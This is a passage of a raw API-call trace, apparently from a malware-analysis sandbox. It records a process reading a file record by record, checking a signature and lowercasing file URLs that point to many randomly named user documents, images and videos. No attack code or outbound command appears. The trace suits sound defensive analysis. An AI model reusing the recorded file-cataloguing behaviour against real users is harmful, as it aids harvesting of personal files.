_Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.804] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/KO7vfyUf_S9dMC.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp" [0085.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 62 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.804] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.804] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.804] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/3I2Irr0cMCLAX.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf" [0085.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 101 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.805] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.805] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/mTGRgfoDAYRAe.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png" [0085.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 69 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.805] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.805] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/F-0YO_9NEEJgd78f.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx" [0085.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 67 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.805] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.805] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/cWMCE43U6A.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png" [0085.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 75 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.805] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.805] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.805] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/AbD4ADF.doc" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc" [0085.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 57 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.806] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.806] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/6ajwk7gtt_t6-1WJ3G.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp" [0085.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 83 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.806] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.806] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/zH5oR54.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg" [0085.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 120 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.806] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.806] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/GYuIx6oheT.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf" [0085.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 65 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.806] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.806] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.807] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/49GDy95-0C.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv" [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 65 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.807] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.807] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/HDFQW%20QK5sILpA%20IO/wAL.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif" [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 133 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.807] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.807] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/FrPgv.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx" [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 56 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.807] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.807] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/N0tkYSumLl.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt" [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 98 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.807] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.807] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.807] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/AtBj.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png" [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 69 [0085.808] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.814] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.814] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.814] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/PaSZghjjdkTQmQ.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png" [0085.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 122 [0085.814] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.814] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.814] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.814] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/iTYXKmICVRIN0bTQ.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif" [0085.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 124 [0085.815] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.815] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.815] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.815] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/nOnGhMvFyP69P.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx" [0085.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 64 [0085.815] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.815] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.815] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.815] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/JNes3c.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf" [0085.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 56 [0085.815] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.815] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.815] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.816] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/U9ror.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv" [0085.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 53 [0085.816] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.816] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.816] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.816] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/LplDJ8US8Y.ods" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods" [0085.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned 98 [0085.816] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.816] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.816] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.816] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/_5Xg3ieR-fEuaPUc9W9.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp" [0085.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned 88 [0085.816] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.816] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.816] 